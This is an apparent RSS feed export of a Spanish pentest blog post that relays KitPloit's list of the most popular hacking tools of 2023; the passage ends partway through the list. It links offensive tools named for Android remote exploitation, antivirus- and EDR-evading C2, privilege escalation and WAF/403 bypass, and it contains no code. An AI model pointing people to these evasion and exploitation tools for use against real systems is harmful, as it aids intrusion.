<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>Blackploit [PenTest]</title><description>3l Conocimiento Debe Ser Libr3!</description><managingEditor>noreply@blogger.com (Leo Romero)</managingEditor><pubDate>Mon, 10 Nov 2025 05:02:51 -0300</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">615</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://www.blackploit.com/</link><language>en-us</language><item><title>Las 20 herramientas de hacking más populares del 2023</title><link>http://www.blackploit.com/2023/12/las-20-herramientas-de-hacking-mas.html</link><category>Blackploit</category><category>Hack T00LZ</category><category>Herramientas</category><category>KitPloit</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Thu, 28 Dec 2023 09:00:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-3361376036055483380</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYnD1fH09GU2A-MQc62AVEhnIlY4iMYS6mBX8L05ZBXaIvHeeFKpydR2C3uTcRdj7Iq4pTQdbNXwIVpK2vhwLVR9HgHiHjmfa0HR563fLiKlMTXPpDhcQTfGTsOE6OvTilGHH0iV_HPVIBio_I9qGJPuGRMTWb7qhqJM44hdKcll0Y_itCDOsFsw0___X2/s1201/most-popular-tools-2023.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="797" data-original-width="1201" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYnD1fH09GU2A-MQc62AVEhnIlY4iMYS6mBX8L05ZBXaIvHeeFKpydR2C3uTcRdj7Iq4pTQdbNXwIVpK2vhwLVR9HgHiHjmfa0HR563fLiKlMTXPpDhcQTfGTsOE6OvTilGHH0iV_HPVIBio_I9qGJPuGRMTWb7qhqJM44hdKcll0Y_itCDOsFsw0___X2/w640-h424/most-popular-tools-2023.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="text-align: justify;"&gt;En un ranking elaborado por&amp;nbsp;&lt;/span&gt;&lt;a href="https://www.kitploit.com/" style="text-align: justify;" target="_blank"&gt;&lt;b&gt;Kitploit&lt;/b&gt;&lt;/a&gt;&lt;span style="text-align: justify;"&gt;, nos muestran las 20 herramientas más populares (con más visitas) durante el 2022. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="text-align: justify;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="text-align: justify;"&gt;Las herramientas de este año abarcan una amplia gama de disciplinas en ciberseguridad, incluyendo Pruebas de Penetración Mejoradas con IA, Gestión Avanzada de Vulnerabilidades, y mucho más.&amp;nbsp;&lt;/span&gt;&lt;span style="text-align: justify;"&gt;Sin más, los dejo con la lista:&lt;/span&gt;&lt;/div&gt;

&lt;div style="text-align: justify;"&gt;
   &lt;div&gt;&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;ol&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/04/phonesploit-pro-all-in-one-hacking-tool.html" target="_blank"&gt;PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKqdKvDhv1ulIcXvIw6I5N_YPcqn5PawuoGY62pj92lK2CU_FkkBHNe4eTOEHBb2_K_qxhqkg50wiQg907Qa__kidft9WqR9RB24NxXSeTIwSi1H3jBUZ0GAlior80On0TU59StXT4gyCwy-AfVx3gtMqv8J7cMNi01xrZ8T4ulIPgZg_z5j6dKjGid2jj/s1600/01-PhoneSploit-Pro_8_Screenshot-1-789205.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1600" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKqdKvDhv1ulIcXvIw6I5N_YPcqn5PawuoGY62pj92lK2CU_FkkBHNe4eTOEHBb2_K_qxhqkg50wiQg907Qa__kidft9WqR9RB24NxXSeTIwSi1H3jBUZ0GAlior80On0TU59StXT4gyCwy-AfVx3gtMqv8J7cMNi01xrZ8T4ulIPgZg_z5j6dKjGid2jj/w400-h193/01-PhoneSploit-Pro_8_Screenshot-1-789205.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/02/gmailc2-fully-undetectable-c2-server.html" target="_blank"&gt;Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

     &lt;div class="separator" style="clear: both;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0rG76TPGIXnVS8M8dVMTdis-YjONIxnoqpKDthB8_g1SUJMsGAenJlfWT5x5u12t8FcFh3h87F38XPG-HB36aC2FmYi203dKuga-4oc64FifxKGVFav2WqalC2vrD-jN-5xcOh_vvYfYPC_bYhQw9aYfxTTNkkBHRCxO_SfpBZdIgiR0k5a6cmjG5voOL/s913/02-gmailc2_1-751459.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="317" data-original-width="913" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0rG76TPGIXnVS8M8dVMTdis-YjONIxnoqpKDthB8_g1SUJMsGAenJlfWT5x5u12t8FcFh3h87F38XPG-HB36aC2FmYi203dKuga-4oc64FifxKGVFav2WqalC2vrD-jN-5xcOh_vvYfYPC_bYhQw9aYfxTTNkkBHRCxO_SfpBZdIgiR0k5a6cmjG5voOL/w400-h139/02-gmailc2_1-751459.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/02/faraday-open-source-vulnerability.html" target="_blank"&gt;Faraday - Open Source Vulnerability Management Platform&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUkh0GDZ9T_MK4qOYgIalX4ZKcAzB-QeUxd32E9tlWG-mkiBWqJGdSqe6lzh7uQECXoc2h1eINZSnLKM03VotKlnVPhs6Bo0sotnt4haCa-NOMTjM_r_NBCoO3UsAop_RbLcc1dLJ8ThlUTFtbegRLD4Zkp52dl8bbKn-Q3qLiOmS_GeBSY1FdwRPNvzUf/s2880/03-faraday_4_manage.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1376" data-original-width="2880" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUkh0GDZ9T_MK4qOYgIalX4ZKcAzB-QeUxd32E9tlWG-mkiBWqJGdSqe6lzh7uQECXoc2h1eINZSnLKM03VotKlnVPhs6Bo0sotnt4haCa-NOMTjM_r_NBCoO3UsAop_RbLcc1dLJ8ThlUTFtbegRLD4Zkp52dl8bbKn-Q3qLiOmS_GeBSY1FdwRPNvzUf/w400-h191/03-faraday_4_manage.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/12/cloakquest3r-uncover-true-ip-address-of.html" target="_blank"&gt;CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare &lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjONpYcs0gRZDB_C76R2l6bVNBJ9MNXKvDn5koOdEMb9rClJomTjPqEFa9_FXMEiCS98YkBd6AymuNHWO2EjzX2rBWKJmxFP2XSGgHHZvlzYtw7aE3Vwbv85gEM2abPTo4lYbZfPWtpCvMkfIqoZnvTvjx6b8p_aFCzZPhV904pcsNJeEt7yH8uUWkzvXbQ/s1192/04-CloakQuest3r_13-776316.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1092" data-original-width="1192" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjONpYcs0gRZDB_C76R2l6bVNBJ9MNXKvDn5koOdEMb9rClJomTjPqEFa9_FXMEiCS98YkBd6AymuNHWO2EjzX2rBWKJmxFP2XSGgHHZvlzYtw7aE3Vwbv85gEM2abPTo4lYbZfPWtpCvMkfIqoZnvTvjx6b8p_aFCzZPhV904pcsNJeEt7yH8uUWkzvXbQ/w400-h366/04-CloakQuest3r_13-776316.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/06/killer-is-tool-created-to-evade-avs-and.html" target="_blank"&gt;Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools &lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0klerjXg5uMouYAvIi1C99pv5UOhOY1IJ8lc7KoCOHhGz1sPzUNi3RgQ7iP5Rxy3DHyy1YNG9FYfvFIBy6uFzKhg2iYAULT8NaBJrSLFcljcWn-TNgnexk3CHzvORrZTgpJqZZKpj6oriPM42Ys-MgRh4luGhNSUjVanAWMII87Mkaelr39n-i6QIv2-G/s1600/05-Killer_1-701362.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="900" data-original-width="1600" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0klerjXg5uMouYAvIi1C99pv5UOhOY1IJ8lc7KoCOHhGz1sPzUNi3RgQ7iP5Rxy3DHyy1YNG9FYfvFIBy6uFzKhg2iYAULT8NaBJrSLFcljcWn-TNgnexk3CHzvORrZTgpJqZZKpj6oriPM42Ys-MgRh4luGhNSUjVanAWMII87Mkaelr39n-i6QIv2-G/w400-h225/05-Killer_1-701362.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/03/geowifi-search-wifi-geolocation-data-by.html" target="_blank"&gt;Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases &lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCRdZk3qpXBbVcUfMZXwk6Y6o27osUXaFs6Agfj15M6QKePVulrFrbSqz65wU5su19h69grcx_JvIFRsFyGfIv8ue_S0l3OaXrMaVOFFjoJdy1FPu59I62_KwogVTpsHgN1moOU1tzIsmUL0V6xMXmVCQboOKWDzmGUpELQa76p2TjgeHCDdqW8Gg8kmzj/s839/06-geowifi_1-739512.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="457" data-original-width="839" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCRdZk3qpXBbVcUfMZXwk6Y6o27osUXaFs6Agfj15M6QKePVulrFrbSqz65wU5su19h69grcx_JvIFRsFyGfIv8ue_S0l3OaXrMaVOFFjoJdy1FPu59I62_KwogVTpsHgN1moOU1tzIsmUL0V6xMXmVCQboOKWDzmGUpELQa76p2TjgeHCDdqW8Gg8kmzj/w400-h217/06-geowifi_1-739512.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/03/waf-bypass-check-your-waf-before.html" target="_blank"&gt;Waf-Bypass - Check Your WAF Before An Attacker Does &lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMorc2-vyJMSzIIboAesv7uPhPCCq7_nKsn3TVnv5S0FoGKqerId46i42SFeuIR8fhivo1r2GWp-x_9HIYvog8Fbgog3ejjxq9qcvU1rRZFS4ySmaX6rNHihOQvTR9u5VznoPcDBMUo79_lvcZKFoy8FBOSRuJgcPshbsAnSgHVlWxgE0jYMPUxvbqll-1/s1600/07-waf-bypass_1-706647.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1238" data-original-width="1600" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMorc2-vyJMSzIIboAesv7uPhPCCq7_nKsn3TVnv5S0FoGKqerId46i42SFeuIR8fhivo1r2GWp-x_9HIYvog8Fbgog3ejjxq9qcvU1rRZFS4ySmaX6rNHihOQvTR9u5VznoPcDBMUo79_lvcZKFoy8FBOSRuJgcPshbsAnSgHVlWxgE0jYMPUxvbqll-1/w400-h310/07-waf-bypass_1-706647.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/05/pentestgpt-gpt-empowered-penetration.html" target="_blank"&gt;PentestGPT - A GPT-empowered Penetration Testing Tool &lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg09HU2Hd5qNZ57Jye4HduEHYEQSKuc2GIscuRmsSNhQclPBJL-qD_ffDBVAaYWO0qu-2c5QyfTc_9tYV2Z5sCx5Oqbc7I77AGyQSuli_iZXSD7CYt_0Z84Ym-nSY8Olt6kV9qsZ9C4B3Hw6dsKU4TDHg3zVrir1nrUer8FLvRIXxJ67X4p_an2aiLkVWEP/s1228/08-PentestGPT.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="713" data-original-width="1228" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg09HU2Hd5qNZ57Jye4HduEHYEQSKuc2GIscuRmsSNhQclPBJL-qD_ffDBVAaYWO0qu-2c5QyfTc_9tYV2Z5sCx5Oqbc7I77AGyQSuli_iZXSD7CYt_0Z84Ym-nSY8Olt6kV9qsZ9C4B3Hw6dsKU4TDHg3zVrir1nrUer8FLvRIXxJ67X4p_an2aiLkVWEP/w400-h233/08-PentestGPT.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/10/sirius-first-truly-open-source-general.html" target="_blank"&gt;Sirius - First Truly Open-Source General Purpose Vulnerability Scanner&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijL2AcUO4tsyIaDCBpouN9wD3LYcnxXyi7Ab1lxkL57BIh5UD9o2s7GwoEMQCbi4PKTdkBAdCTsXHpRs0iJqFSAkDDzb1VGLj5_BMMnPgCc_RQrePDiYwwp9D44QiAdiO-lDlQztCXLtNGIRPozB0Jrg15o2scFdoYyEF2XlnTwgzMYGW4D-bY_zIitUVa/s1733/09-Sirius.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="924" data-original-width="1733" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijL2AcUO4tsyIaDCBpouN9wD3LYcnxXyi7Ab1lxkL57BIh5UD9o2s7GwoEMQCbi4PKTdkBAdCTsXHpRs0iJqFSAkDDzb1VGLj5_BMMnPgCc_RQrePDiYwwp9D44QiAdiO-lDlQztCXLtNGIRPozB0Jrg15o2scFdoYyEF2XlnTwgzMYGW4D-bY_zIitUVa/w400-h214/09-Sirius.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/06/lsms-linux-security-and-monitoring.html" target="_blank"&gt;LSMS - Linux Security And Monitoring Scripts&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyykrJi0TY4xoPsbb_3ZyWHZUO0l1MmisE-dQU23FYYbW1f4_zDK36ggL5ZRji7UsTx2Ao_eOy4aUn0bH9FS_ijY5qmSQnKRn4NB2n1vgVt-ejYGwqw4zmqTKZKVCm-ovj9qUtfYm5liFJacgQ8snH8CoLSZCXenRr9jRv7J_qyiv5xO_EEUgpC3S7HztP/s537/10-h39.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="353" data-original-width="537" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyykrJi0TY4xoPsbb_3ZyWHZUO0l1MmisE-dQU23FYYbW1f4_zDK36ggL5ZRji7UsTx2Ao_eOy4aUn0bH9FS_ijY5qmSQnKRn4NB2n1vgVt-ejYGwqw4zmqTKZKVCm-ovj9qUtfYm5liFJacgQ8snH8CoLSZCXenRr9jRv7J_qyiv5xO_EEUgpC3S7HztP/w400-h263/10-h39.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/05/godpotato-local-privilege-escalation.html" target="_blank"&gt;GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_EDQv2rQMk8HL3YEXW-BZxAlmu9UtpCeXWp6f7yhl3dECU-J7FJsY6wCDmVhZ4sMqzktHCEYzL7QE_Qj6gxNAEjrU49slHeXbM5Be4VAdp20RVQdU93W-uNXVMQAOFWMIhvNmGDWfgnXwSlBT3daaXRtNpx5Kna4OguZqGfAtbuSYN-J_-PzYF8g3aX8/s1600/11-GodPotato_2_2-721080.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1273" data-original-width="1600" height="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_EDQv2rQMk8HL3YEXW-BZxAlmu9UtpCeXWp6f7yhl3dECU-J7FJsY6wCDmVhZ4sMqzktHCEYzL7QE_Qj6gxNAEjrU49slHeXbM5Be4VAdp20RVQdU93W-uNXVMQAOFWMIhvNmGDWfgnXwSlBT3daaXRtNpx5Kna4OguZqGfAtbuSYN-J_-PzYF8g3aX8/w400-h319/11-GodPotato_2_2-721080.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/05/bypass-403-simple-script-just-made-for.html" target="_blank"&gt;Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQVfmWv3sTrOyIBhqUYoCkrVshzIg30TFfmCjPxMi2-cy1q06YVogHBTCTDvUKdr9yXyDKoWO6QsnWpfwzPowOAV7JmBAYcv-dEwiHpFE_7QHVIOZ895d2ZwIzXIFtOCDqmPt2INBGRpNmt4ZSx6mnlolMwi7HnJPtmzi7InF4vQG5JIsSD-FmzO18rxd0/s876/12-bypass-403_1_responses-773500.jpeg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="736" data-original-width="876" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQVfmWv3sTrOyIBhqUYoCkrVshzIg30TFfmCjPxMi2-cy1q06YVogHBTCTDvUKdr9yXyDKoWO6QsnWpfwzPowOAV7JmBAYcv-dEwiHpFE_7QHVIOZ895d2ZwIzXIFtOCDqmPt2INBGRpNmt4ZSx6mnlolMwi7HnJPtmzi7InF4vQG5JIsSD-FmzO18rxd0/w400-h336/12-bypass-403_1_responses-773500.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/03/thundercloud-cloud-exploit-framework.html" target="_blank"&gt;ThunderCloud - Cloud Exploit Framework&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQM_yPE6ntV9JTpFwBOxeJk0kpfiLOUumSwK-aonXpC6pxc1SCrvPuoUqNrJkKYthhGusHz_mUpA6_a0tXtSxof1D-g5uiM5KUOsdckFa512d3kRtpSo_3HC3SOdTNHzXYwa9bqSqnys-UuXvzrFaW1IoNCTfhbiae-Mj0ggGC2mzddaVUAbydNaT-ggpH/s1004/13-ThunderCloud.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="754" data-original-width="1004" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQM_yPE6ntV9JTpFwBOxeJk0kpfiLOUumSwK-aonXpC6pxc1SCrvPuoUqNrJkKYthhGusHz_mUpA6_a0tXtSxof1D-g5uiM5KUOsdckFa512d3kRtpSo_3HC3SOdTNHzXYwa9bqSqnys-UuXvzrFaW1IoNCTfhbiae-Mj0ggGC2mzddaVUAbydNaT-ggpH/w400-h300/13-ThunderCloud.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/03/gptvuln-analyzer-uses-chatgpt-api-and.html" target="_blank"&gt;GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWEnmgyJv6dU0kTR07O6TB2-N2JL7Sz4GMa1sXjkS6IxPqBdBgC1D5EPmyur8iZtJhFMyZLMGm1Xxl-HCNr7q5JNcyTiYnfhI8vYzxlX-Wz40dzh0CgohyXQ4rLlF9PZHPKmuMaOfBMvhoNMF7S2XqCLfIazRYORD45aM0mLGuLg813QuhYUAm8tsalGq1/s1920/14-chatgpt_hack.jpeg" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1080" data-original-width="1920" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWEnmgyJv6dU0kTR07O6TB2-N2JL7Sz4GMa1sXjkS6IxPqBdBgC1D5EPmyur8iZtJhFMyZLMGm1Xxl-HCNr7q5JNcyTiYnfhI8vYzxlX-Wz40dzh0CgohyXQ4rLlF9PZHPKmuMaOfBMvhoNMF7S2XqCLfIazRYORD45aM0mLGuLg813QuhYUAm8tsalGq1/w400-h225/14-chatgpt_hack.jpeg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/01/kscan-simple-asset-mapping-tool.html" target="_blank"&gt;Kscan - Simple Asset Mapping Tool&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwzdicwcROOmnMTQN-TlFeDNlyb1gnSAR9K96UNsi1TamMRNypRlXjGs4zkXgP_Go_hCqW18i9i-rp_qY5FEuw4TSSQdkZ2RSi30C06f68wewAvjM5wGpvFhPQTnqHiBUIxwwBNanXOEwXoczlgWXOHPo4SiSBWoy4ldGrbDLq8N-CKLdEG9fBlTln2kE4/s1315/15-kscan_8-774852.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="620" data-original-width="1315" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwzdicwcROOmnMTQN-TlFeDNlyb1gnSAR9K96UNsi1TamMRNypRlXjGs4zkXgP_Go_hCqW18i9i-rp_qY5FEuw4TSSQdkZ2RSi30C06f68wewAvjM5wGpvFhPQTnqHiBUIxwwBNanXOEwXoczlgWXOHPo4SiSBWoy4ldGrbDLq8N-CKLdEG9fBlTln2kE4/w400-h189/15-kscan_8-774852.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2023/03/redteam-physical-tools-red-team-toolkit.html" target="_blank"&gt;RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
